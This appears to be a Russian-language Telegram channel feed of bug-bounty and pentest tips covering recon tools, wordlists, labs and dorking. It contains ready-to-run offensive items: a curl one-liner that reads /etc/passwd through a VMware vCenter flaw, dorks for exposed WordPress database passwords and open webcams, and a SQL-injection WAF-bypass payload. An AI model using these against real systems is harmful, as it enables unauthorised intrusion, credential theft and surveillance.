Топ 7 скриптов для сканера NMAP
🔗Dns — brute.nse
🔗Traceroute — отображает географическое местоположение цели.
🔗firewalk.nse — этот скрипт пытается узнать правила брандмауэра.
🔗Http-sitemap-generator.nse — Паук вэб-сервера который отображает структуру сайта, файлы и каталоги.
🔗HTTP-methods.nse — определяет какие параметры поддерживаются HTTP-сервером, отправив запрос OPTIONS. Он проверяет те методы, которые не указаны в заголовках OPTIONS, и видит, реализованы ли они.
🔗Whois-domain.nse — получает информацию о доменном имени цели.
🔗Shodan-api.nse — этот скрипт попросит API ключик для поисковика SHODAN. Выдаст всю информацию о хосте, которая имеется в SHODAN-e
#usefl
🔗Dns — brute.nse
🔗Traceroute — отображает географическое местоположение цели.
🔗firewalk.nse — этот скрипт пытается узнать правила брандмауэра.
🔗Http-sitemap-generator.nse — Паук вэб-сервера который отображает структуру сайта, файлы и каталоги.
🔗HTTP-methods.nse — определяет какие параметры поддерживаются HTTP-сервером, отправив запрос OPTIONS. Он проверяет те методы, которые не указаны в заголовках OPTIONS, и видит, реализованы ли они.
🔗Whois-domain.nse — получает информацию о доменном имени цели.
🔗Shodan-api.nse — этот скрипт попросит API ключик для поисковика SHODAN. Выдаст всю информацию о хосте, которая имеется в SHODAN-e
#usefl
👍16❤3
В этой статье мы рассмотрим 20 лучших инструментов для хакинга на Kali Linux. Это подборка средств для аудита и взлома беспроводных сетей, проверки уязвимостей и разведки.
#tools #kali
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤2
🇪🇺 Списки слов для фаззинга сайтов на разных языках
При фаззинге сайта полезно учитывать его географическое положение и языковые особенности, а значит, следует использовать слова, которые присущи тем или иным языкам. Ниже представлены некоторые вордлисты, для различных языков:
💬 Infosec Wordlists
💬 Dirbuster Spanish
💬 Bip Spanish
💬 Türkçe Wordlist
💬 krypt0n wordlists
💬 Combined-Wordlists
💬 Common Web Managers Fuzz Wordlists
💬 Cracking French passwords
#fuzz #wordlist
При фаззинге сайта полезно учитывать его географическое положение и языковые особенности, а значит, следует использовать слова, которые присущи тем или иным языкам. Ниже представлены некоторые вордлисты, для различных языков:
#fuzz #wordlist
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤2👏1
Представленный ниже репозиторий содержит подборку видео по тестированию веб-приложений на различные уязвимости. Для удобства, содержимое разбито на категории, в зависимости от типа атак и уязвимостей.
#Web
Please open Telegram to view this post
VIEW IN TELEGRAM
В VMware vCenter обнаружили ряд уязвимостей, среди которых несанкционированное чтение произвольных файлов, SSRF и XSS. Протестировано на версии 7.0.2.00100, информации про полный список уязвимых версий нет.
Для поиска уязвимых хостов можно использовать однострочник:
cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done
Дорк, который можно использовать для поиска в Shodan:http.title:"ID_VC_Welcome"
Для поиска в Zoomeye:app:"VMware vCenter"
#LFI #SSRF #XSSPlease open Telegram to view this post
VIEW IN TELEGRAM
👍3❤1👏1🤔1
🔬 Поиск внутренних служб в файлах JavaScript
Если вы нашли SSRF, но не смогли получить доступ к внутренним веб-службам, всегда стоит заглянуть в файлы JavaScript, в частности в
Осмотрите содержимое этих файлов по ключевым словам
#SSRF #JS
Если вы нашли SSRF, но не смогли получить доступ к внутренним веб-службам, всегда стоит заглянуть в файлы JavaScript, в частности в
main.js или app.js.Осмотрите содержимое этих файлов по ключевым словам
localhost, 127.0.0.1, host, port, и т.д., и вы можете найти скрытые внутренние ресурсы, к которым можно получить доступ через SSRF.#SSRF #JS
👍4🥰1
Обход регистрации, захват аккаунта любого пользователя и выполнение действий от его имени с помощью изменений в своем личном кабинете.
#ATO
Please open Telegram to view this post
VIEW IN TELEGRAM
📚 Небольшая подборка онлайн лаб от Hackxpert
Ниже представлена подборка лабораторий для практики поиска различных уязвимостей:
💬 Reflected XSS
💬 Stored XSS
💬 JWT
💬 RFI
💬 LFI
💬 Обход Captcha
💬 Обход панели входа админа
💬 Open redirects
#web #lab
Ниже представлена подборка лабораторий для практики поиска различных уязвимостей:
#web #lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👎9❤4🤔1
Ниже представлена небольшая подборка Google дорков для поиска открытых веб-камер:
allintitle: "Network Camera NetworkCamera"
intitle:"EvoCam" inurl:"webcam.html"
intitle:"Live View / - AXIS"
intitle:"LiveView / - AXIS" | inurl:view/view.shtml
intitle:"Live View / - AXIS" | inurl:/mjpg/video.mjpg?timestamp
inurl:axis-cgi/jpg
inurl:"MultiCameraFrame?Mode=Motion"
inurl:/view.shtml
inurl:/view/index.shtml
"my webcamXP server!"
#DorkingPlease open Telegram to view this post
VIEW IN TELEGRAM
👍16
1.- Оставлять настройки по умолчанию.Скрин ниже тому подтверждение. Найти подобные хосты можно с помощью Google дорка:
2.- Допускать отсутствия контроля над публичным контентом и политиками.
"define('DB_USER'," "define('DB_PASSWORD'," ext:txt
#WPPlease open Telegram to view this post
VIEW IN TELEGRAM
👍10💘1
При пентесте сайтов мы зачастую ищем утечки в различных местах, включая GitHub, JS-файлы, HTTP-ответы, исходные коды и других местах.
В результате, находится множество ключей и токенов. Если мы знаем к чему относится ключ, то можем поискать способы его эксплуатации в репозитории KeyHacks.
Однако, бывают случаи, когда мы не знаем действительны ли найденные токены / ключи или к какой службе они принадлежат? Одним из способов определить это является атака Token Spray.
По сути, в этой атаке мы берём найденный токен и пытаемся использовать его во всех подряд общеизвестных службах. Если где то сработает, то мы соответственно узнаем принадлежность этого ключа.
Но так как вручную делать это долго и не интересно, мы можем использовать новые шаблоны в Nuclei (не забудьте обновиться). Для их использования достаточно выполнить:
nuclei -t ~/nuclei-templates/token-spray -var token=XXX_TOKEN_XXX
Или сохраните все токены в файл и выполните:nuclei -t ~/nuclei-templates/token-spray -var token=token_list.txt
#ReconPlease open Telegram to view this post
VIEW IN TELEGRAM
👍4
1. Что вы делаете в первую очередь, когда выполняете GitHub Dorking? Вы находите страницу своей цели на Github.
2. В 50% случаев не найдете утечек на их главной странице GitHub, но есть ли другие страницы, на которых можно попробовать найти что-то?
Ответ - Да! Если вы перейдёте на GitHub своей цели и прокрутите вниз, то увидите вкладку «People». Это сотрудники, которые официально работают с вашей целью.
3. Теперь из вкладки «People» перейдите на страницу любого сотрудника. Всех сотрудников, упомянутых на вкладке «People» также можно проверить с помощью дорков Github для поиска конфиденциальной информации, относящейся к нашей цели. Таким образом, наша поверхность атаки становится значительно выше.
Однако помните, что у этих сотрудников есть иная деятельность, нежели работа на исследуемую вами компанию, а это значит, что некоторые конфиденциальные утечки могут относиться к другим проектам, а не к вашей цели.
4. Иногда вы не можете найти утечки по сотрудникам на вкладке «People», не волнуйтесь, есть еще кое-что, что поможет вам увеличить поверхность атаки!
Пробуем найти сотрудников извне. Например, с помощью дорка в гугл:
site:linkedin.com intext:"software engineer at название_компании"
Искать можно не только на LinkedIn. Думаю вы поняли основной принцип. Так вы найдете сотрудников, которые работают на вашу целевую компанию, но все еще не указаны на вкладке «People». Почему?Может быть, потому что они должны храниться в секрете, и они публикуют конфиденциальные материалы... Никогда не угадаешь.
Теперь, когда вы нашли еще несколько сотрудников, нужно найти их страницы на Github. Обычно у всех разработчиков программного обеспечения есть страница на GitHub.
Чтобы найти ее, посмотрите в описание профиля или используйте этот гугл-дорк:
site:github.com intext:тут_ник_сотрудника
Или просто напишите в поиске:github тут_ник_сотрудника
#GitHub #DorkPlease open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥2
Разработчики Netlas (аналог Shodan) представили статью, в которой рассказывают об автоматизации поиска хостов с помощью своей консольной утилиты. Скрипты из статьи доступны на GitHub.
Кроме того, нам любезно предоставили большую подборку дорков, ознакомиться с которой вы можете по данной ссылке.
#Dork
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4👏1
📌 Автоматизация JavaScript-разведки
Основные этапы JavaScript-разведки в Bug Bounty это:
1 - Сбор файлов JS от цели.
2 - Поиск конечных точек из файлов JS.
3 - Поиск секретов в файлах JS.
4 - Получение файлов JS локально для ручного анализа.
7 - Извлечение имен переменных из файлов JS для проверки на XSS.
8 - Сканировать файлов JS на наличие DomXSS.
Для автоматизация вышеперечисленных и некоторых других действий есть неплохой инструмент, под названием JSFScan. Достаточно передать ему список поддоменов и задать опции в соответствии с вашими предпочтениями.
Ниже представлено видео, демонстрирующее процесс работы с данным инструментом.
⏺ Ссылка на GitHub
⏺ Ссылка на видео
#Web #JS
| Привет, друг. На связи Эллиот.
Основные этапы JavaScript-разведки в Bug Bounty это:
1 - Сбор файлов JS от цели.
2 - Поиск конечных точек из файлов JS.
3 - Поиск секретов в файлах JS.
4 - Получение файлов JS локально для ручного анализа.
7 - Извлечение имен переменных из файлов JS для проверки на XSS.
8 - Сканировать файлов JS на наличие DomXSS.
Для автоматизация вышеперечисленных и некоторых других действий есть неплохой инструмент, под названием JSFScan. Достаточно передать ему список поддоменов и задать опции в соответствии с вашими предпочтениями.
Ниже представлено видео, демонстрирующее процесс работы с данным инструментом.
#Web #JS
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5
🗄 Вариант поиска уязвимостей при пассивном анализе
Одним из шагов, которые я предпринимаю при исследовании нового домена, является получение целевых конечных точек и URL-адресов, выявленных третьими сторонами. Это можно сделать с помощью инструментов с открытым исходным кодом, таких как gau.
Инструмент getallurls (gau) извлекает известные URL-адреса из AlienVault's Open Threat Exchange, Wayback Machine и Common Crawl для любого заданного домена. Выполняем команду:
В примере на фото ниже привлекает внимание слово
#Web #Leak
Одним из шагов, которые я предпринимаю при исследовании нового домена, является получение целевых конечных точек и URL-адресов, выявленных третьими сторонами. Это можно сделать с помощью инструментов с открытым исходным кодом, таких как gau.
Инструмент getallurls (gau) извлекает известные URL-адреса из AlienVault's Open Threat Exchange, Wayback Machine и Common Crawl для любого заданного домена. Выполняем команду:
printf site.com | gau
После этого начинаем вручную анализировать конечные точки и URL-адреса, уделяя особое внимание некоторым чувствительным ключевым словам:invoice, discount, promo-code, join, redirect, reset_password, reset-password, password, TrackOrder, token, invite.В примере на фото ниже привлекает внимание слово
invite. После нажатия по данной ссылке открывается страница регистрации. После создания новой учетной записи с личной электронной почтой (@gmail.com) сайт просто перенаправляет на страницу компании внутри целевого приложения, содержащую всех приглашенных сотрудников и конфиденциальную информацию.#Web #Leak
👍3
Репозиторий, представленный ниже, содержит информацию о механизмах закрепления в системах Windows. Большая часть из них хорошо известна в течение многих лет и активно используется в различных сценариях.
Репозиторий появился недавно и автор обещает активно пополнять его со временем.
#Windows
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👏2⚡1👍1
📑 Пассивный сбор URL адресов и ответов сервера
Любой, кто занимается Bug Bounty, скорее всего, использовал waybackurls. Этот инструмент получает URL-адреса с web.archive.org и дополнительные ссылки (если таковые имеются) из index.commoncrawl.org. Вы, вероятно, также использовали gau, который находит URL-адреса из Wayback архива, Common Crawl, а также из Alien Vault и URLScan.
Инструмент под название waymore также получает URL-адреса из всех этих источников. Но самое главное различие между waymore и другими инструментами заключается в том, что он может загружать из архива ещё и ответы от сервера на эти URL-адреса из Wayback Machine, чтобы затем искать еще больше ссылок, комментариев разработчиков, дополнительных параметров и т.д.
Вы можете поближе познакомиться с инструментом на его GitHub странице. Можно также заглянуть в видео по ссылке, где показан пример его работы и использование другой утилиты от этого автора, под названием xnLinkFinder, для поиска URL адресов уже в собранных ответах сервера.
P.S.
Кстати, кроме xnLinkFinder можно ещё заюзать trufflehog для поиска секретов:
Любой, кто занимается Bug Bounty, скорее всего, использовал waybackurls. Этот инструмент получает URL-адреса с web.archive.org и дополнительные ссылки (если таковые имеются) из index.commoncrawl.org. Вы, вероятно, также использовали gau, который находит URL-адреса из Wayback архива, Common Crawl, а также из Alien Vault и URLScan.
Инструмент под название waymore также получает URL-адреса из всех этих источников. Но самое главное различие между waymore и другими инструментами заключается в том, что он может загружать из архива ещё и ответы от сервера на эти URL-адреса из Wayback Machine, чтобы затем искать еще больше ссылок, комментариев разработчиков, дополнительных параметров и т.д.
Вы можете поближе познакомиться с инструментом на его GitHub странице. Можно также заглянуть в видео по ссылке, где показан пример его работы и использование другой утилиты от этого автора, под названием xnLinkFinder, для поиска URL адресов уже в собранных ответах сервера.
P.S.
Кстати, кроме xnLinkFinder можно ещё заюзать trufflehog для поиска секретов:
trufflehog filesystem --directory=/results/domain.com
#Recon👍3🔥1
💉 Совет по обходу WAF для SQL-инъекций
Если вы пытаетесь выполнить SQL инъекцию и ее блокирует WAF, попробуйте использовать особенности Е-нотации в синтаксисе SQL. Таким образом, вы можете обфусцировать свой запрос и оказаться вне поля зрения WAF.
#Web #WAF #SQLi
Если вы пытаетесь выполнить SQL инъекцию и ее блокирует WAF, попробуйте использовать особенности Е-нотации в синтаксисе SQL. Таким образом, вы можете обфусцировать свой запрос и оказаться вне поля зрения WAF.
https://example.com/getUser?name=' or "=' (403 Forbidden)https://example.com/getUser?name=' or 1337.e(")=' (200 OK)#Web #WAF #SQLi
👍13❤2🤔1
Сегодня предлагаю вам рассмотреть сервис, который осуществляет поиск по таким хранилищам как: Mega, Depositefiles, Dropbox, Turbo Bit, Vip-files и пр. Возможен поиск по 60 наиболее популярным облачным хранилищам.
Если вам необходимо осуществить поиск по менее популярным хранилищам, типа Take File, Anonfiles, Keep2share, Ex-load и пр., то предлагаю рассмотреть другой сервис, который осуществляет поиск по более чем 100 различным ресурсам.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5❤1🔥1
⚒ Недавно выпустили плагин BurpSuite, который использует технологии искусственного интеллекта
Плагин генерирует имена для директорий, параметров и возможных файлов на основе запросов. Для генерации BruteForce листа используется OpenAI. Насколько это эффективно предстоит ещё проверить, но в целом — когда идей больше нет, можно обратиться к ней, чтобы получить "креатива".
На скрине показан пример как нейросеть может описать параметры, для отдельно взятого запроса и результат получается довольно достойным.
⏺ Ссылка на GitHub
#BurpSuite
Плагин генерирует имена для директорий, параметров и возможных файлов на основе запросов. Для генерации BruteForce листа используется OpenAI. Насколько это эффективно предстоит ещё проверить, но в целом — когда идей больше нет, можно обратиться к ней, чтобы получить "креатива".
На скрине показан пример как нейросеть может описать параметры, для отдельно взятого запроса и результат получается довольно достойным.
#BurpSuite
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Бесплатный набор практических заданий от TheXSSRat, которые будут полезны новичкам и помогут вам проверить свои навыки в поиске и эксплуатации распространённых в Bug Bounty уязвимостей, таких как IDOR, XSS, CSRF и логические уязвимости.
Автор также обещает пополнения текущего списка заданий.
#Web
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3